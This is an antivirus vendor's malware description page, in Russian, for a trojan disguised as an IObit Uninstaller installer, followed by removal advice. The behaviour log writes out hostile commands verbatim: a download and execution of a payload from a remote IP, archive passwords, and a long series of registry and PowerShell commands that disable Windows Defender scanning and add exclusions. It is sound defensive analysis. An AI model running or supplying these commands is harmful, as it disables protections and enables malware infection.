Для корректной работы нашего сайта необходимо включить поддержку JavaScript в вашем браузере.
Trojan.Siggen18.48420
Добавлен в вирусную базу Dr.Web:
2022-09-19
Описание добавлено:
2022-09-21
Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
http://45.##9.248.145/hfile.bin как hfile.bin
Запускает на исполнение
'%WINDIR%\syswow64\net.exe' stop "IObit Uninstaller Service"
Изменения в файловой системе
Создает следующие файлы
%TEMP%\is-6lgbo.tmp\<Имя файла>.tmp
%ALLUSERSPROFILE%\surfacereduction\extracted\file_3.zip
%ALLUSERSPROFILE%\surfacereduction\extracted\file_4.zip
%ALLUSERSPROFILE%\surfacereduction\extracted\file_5.zip
%ALLUSERSPROFILE%\surfacereduction\extracted\file_6.zip
%ALLUSERSPROFILE%\surfacereduction\extracted\antiav.data
nul
%ALLUSERSPROFILE%\surfacereduction\extracted\file_7.zip
%ALLUSERSPROFILE%\surfacereduction\file.bin
%ALLUSERSPROFILE%\surfacereduction\controlset003.vbs
%ALLUSERSPROFILE%\surfacereduction\controlset002.bat
%ALLUSERSPROFILE%\surfacereduction\controlset001_obf.bat
%ALLUSERSPROFILE%\surfacereduction\compil32_obf.bat
%ALLUSERSPROFILE%\surfacereduction\extracted\file_2.zip
%ALLUSERSPROFILE%\surfacereduction\hfile.bin
%TEMP%\is-822vn.tmp\metroblue.vsf
%TEMP%\is-822vn.tmp\vclstylesinno.dll
%TEMP%\is-822vn.tmp\istask.dll
%TEMP%\is-822vn.tmp\_isetup\_shfoldr.dll
%TEMP%\is-822vn.tmp\_isetup\_setup64.tmp
%TEMP%\is-822vn.tmp\_isetup\_regdll.tmp
%TEMP%\is-rvocc.tmp\iobit uninstaller 11.6.0.12.tmp
%ALLUSERSPROFILE%\surfacereduction\is-b3lmf.tmp
%ALLUSERSPROFILE%\surfacereduction\is-fkgf5.tmp
%TEMP%\is-ah8ir.tmp\is-a4s9b.tmp
%TEMP%\is-ah8ir.tmp\_isetup\_iscrypt.dll
%TEMP%\is-ah8ir.tmp\_isetup\_setup64.tmp
%TEMP%\is-822vn.tmp\wizardform.bitmapimage1.bmp
%ALLUSERSPROFILE%\surfacereduction\extracted\file_1.zip
Удаляет следующие файлы
%TEMP%\is-ah8ir.tmp\iobit uninstaller 11.6.0.12.exe
%TEMP%\is-ah8ir.tmp\_isetup\_iscrypt.dll
%TEMP%\is-ah8ir.tmp\_isetup\_setup64.tmp
%TEMP%\is-6lgbo.tmp\<Имя файла>.tmp
%ALLUSERSPROFILE%\surfacereduction\7za.exe
%ALLUSERSPROFILE%\surfacereduction\extracted\file_1.zip
%ALLUSERSPROFILE%\surfacereduction\extracted\file_2.zip
%ALLUSERSPROFILE%\surfacereduction\extracted\file_3.zip
%ALLUSERSPROFILE%\surfacereduction\extracted\file_4.zip
%ALLUSERSPROFILE%\surfacereduction\extracted\file_5.zip
%ALLUSERSPROFILE%\surfacereduction\extracted\file_6.zip
%ALLUSERSPROFILE%\surfacereduction\extracted\file_7.zip
%ALLUSERSPROFILE%\surfacereduction\file.zip
%ALLUSERSPROFILE%\surfacereduction\hfile.zip
%ALLUSERSPROFILE%\surfacereduction\main.bat
Перемещает следующие файлы
%TEMP%\is-ah8ir.tmp\is-a4s9b.tmp в %TEMP%\is-ah8ir.tmp\iobit uninstaller 11.6.0.12.exe
%ALLUSERSPROFILE%\surfacereduction\is-fkgf5.tmp в %ALLUSERSPROFILE%\surfacereduction\main.bat
%ALLUSERSPROFILE%\surfacereduction\is-b3lmf.tmp в %ALLUSERSPROFILE%\surfacereduction\7za.exe
%ALLUSERSPROFILE%\surfacereduction\hfile.bin в %ALLUSERSPROFILE%\surfacereduction\hfile.zip
%ALLUSERSPROFILE%\surfacereduction\file.bin в %ALLUSERSPROFILE%\surfacereduction\file.zip
Сетевая активность
Подключается к
TCP
Запросы HTTP GET
http://45.##9.248.145/hfile.bin
Другое
Ищет следующие окна
ClassName: 'Edit' WindowName: ''
Создает и запускает на исполнение
'%TEMP%\is-6lgbo.tmp\<Имя файла>.tmp' /SL5="$A020E,22746193,1185280,<Полный путь к файлу>"
'%ALLUSERSPROFILE%\surfacereduction\7za.exe' e file.zip -p30252ByLHDLfR6540ByLHDLfR8305 -oextracted
'%ALLUSERSPROFILE%\surfacereduction\7za.exe' e extracted/file_3.zip -oextracted
'%ALLUSERSPROFILE%\surfacereduction\7za.exe' e extracted/file_4.zip -oextracted
'%ALLUSERSPROFILE%\surfacereduction\7za.exe' e extracted/file_5.zip -oextracted
'%ALLUSERSPROFILE%\surfacereduction\7za.exe' e extracted/file_7.zip -oextracted
'%ALLUSERSPROFILE%\surfacereduction\7za.exe' e extracted/file_6.zip -oextracted
'%ALLUSERSPROFILE%\surfacereduction\7za.exe' e extracted/file_2.zip -oextracted
'%WINDIR%\syswow64\wscript.exe' "%ALLUSERSPROFILE%\SurfaceReduction\ControlSet003.vbs"
'%ALLUSERSPROFILE%\surfacereduction\7za.exe' x -y -p10619mlgrAGP7211mlgrAGP24753 "*.zip"
'%TEMP%\is-rvocc.tmp\iobit uninstaller 11.6.0.12.tmp' /SL5="$10270,20970856,79872,%TEMP%\is-AH8IR.tmp\IObit Uninstaller 11.6.0.12.exe"
'%TEMP%\is-ah8ir.tmp\iobit uninstaller 11.6.0.12.exe'
'%ALLUSERSPROFILE%\surfacereduction\7za.exe' e extracted/file_1.zip -oextracted
'%WINDIR%\syswow64\cmd.exe' /c ""%ALLUSERSPROFILE%\SurfaceReduction\main.bat" "' (со скрытым окном)
'%WINDIR%\syswow64\cmd.exe' /c ""%ALLUSERSPROFILE%\SurfaceReduction\ControlSet001_obf.bat" "' (со скрытым окном)
'%WINDIR%\syswow64\cmd.exe' /c ""%ALLUSERSPROFILE%\SurfaceReduction\ControlSet002.bat" "' (со скрытым окном)
'%WINDIR%\syswow64\net.exe' stop "IObit Uninstaller Service"' (со скрытым окном)
'%WINDIR%\syswow64\cmd.exe' /c ""%ALLUSERSPROFILE%\SurfaceReduction\compil32_obf.bat" "' (со скрытым окном)
Запускает на исполнение
'%WINDIR%\syswow64\cmd.exe' /c ""%ALLUSERSPROFILE%\SurfaceReduction\main.bat" "
'%WINDIR%\syswow64\ping.exe' 127.0.0.1 -n 5
'%WINDIR%\syswow64\cmd.exe' /c ""%ALLUSERSPROFILE%\SurfaceReduction\ControlSet002.bat" "
'%WINDIR%\syswow64\mode.com' 65,10
'%WINDIR%\syswow64\cmd.exe' /c ""%ALLUSERSPROFILE%\SurfaceReduction\compil32_obf.bat" "
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath "%ALLUSERSPROFILE%\SurfaceReduction"
'%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t reg_DWORD /d "1" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "LocalSettingOverrideSpynetReporting" /t reg_DWORD /d 1 /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t reg_DWORD /d "2" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReportingLocation" /t reg_MULTI_SZ /d "0" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t reg_DWORD /d "0" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t reg_DWORD /d "1" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanParameters" /t reg_DWORD /d 0 /f
'%WINDIR%\syswow64\ping.exe' 127.0.0.1 -n 2
'%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanOnlyIfIdle" /t reg_DWORD /d 0 /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleDay" /t reg_DWORD /d 8 /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "PurgeItemsAfterDelay" /t reg_DWORD /d 0 /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningNetworkFiles" /t reg_DWORD /d "1" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningMappedNetworkDrivesForFullScan" /t reg_DWORD /d "1" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRestorePoint" /t reg_DWORD /d "1" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRemovableDriveScanning" /t reg_DWORD /d "1" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupQuickScan" /t reg_DWORD /d "1" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupFullScan" /t reg_DWORD /d "1" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableArchiveScanning" /t reg_DWORD /d "1" /f
'%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "AvgCPULoadFactor" /t reg_DWORD /d "10" /f
'%WINDIR%\syswow64\cmd.exe' /c ""%ALLUSERSPROFILE%\SurfaceReduction\ControlSet001_obf.bat" "
'%WINDIR%\syswow64\ping.exe' 127.0.0.1 -n 10
'%WINDIR%\syswow64\net1.exe' stop "IObit Uninstaller Service"
'%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleTime" /t reg_DWORD /d 0 /f
'%WINDIR%\syswow64\cmd.exe' /c rd /q /s "%ALLUSERSPROFILE%\SurfaceReduction\"
Рекомендации по лечению
Windows
macOS
Linux
Android
В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store .
Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light . Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
выключите устройство и включите его в обычном режиме.
Подробнее о Dr.Web для Android
Демо бесплатно на 14 дней
Выдаётся при установке
Поздравляем!
Обменяйте их на скидку до 50% на покупку Dr.Web.
Получить скидку
Скачайте Dr.Web для Android
Бесплатно на 3 месяца
Все компоненты защиты
Продление демо через AppGallery/Google Pay
Если Вы продолжите использование данного сайта, это означает, что Вы даете согласие на использование нами Cookie-файлов и иных технологий по сбору статистических сведений о посетителях. Подробнее
OK